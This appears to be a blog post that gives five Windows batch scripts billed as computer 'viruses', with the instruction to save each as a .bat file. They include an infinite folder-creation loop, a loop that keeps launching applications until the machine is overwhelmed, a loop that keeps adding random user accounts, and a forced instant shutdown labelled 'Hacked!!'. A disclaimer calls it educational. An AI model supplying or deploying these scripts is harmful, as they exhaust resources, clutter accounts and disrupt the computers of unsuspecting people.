Biclod

Make Top 5 virus in computer[2020]

Top 5 virus:


1: Matrix

@echo off
color 0a
:x
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
goto x

Now save it as example.bat

2: Folder Bomber

@echo off
:x
md %random%
goto x

 Make a new folder and save this file in it .
Now save it as example.bat
 3: Application Bomber[PARTIALLY DANGEROUS]

@echo off
:x
start notepad.exe /b
start mspaint.exe /b
start cmd.exe /b
start calc.exe /b
goto x

Now save it as example.bat
4: User Bomber [PARTIALLY DANGEROUS]

@echo off
:x
net user %random% /add
goto x

Now save it as example.bat
5:  Shutdown Virus

shutdown.exe -s -t 00 -c "Hacked!! Haha!!"

Now save it as example.bat


Note: 

Any content given in our blog is only for educational purpose our blog does not permote any illegal activity so do it on your own risk.


For more informative content comment in comment box.


Make Top 5 virus in computer[2020] Make Top 5 virus in computer[2020] Reviewed by Future Comunity on 22:26 Rating: 5

No comments:

Powered by Blogger.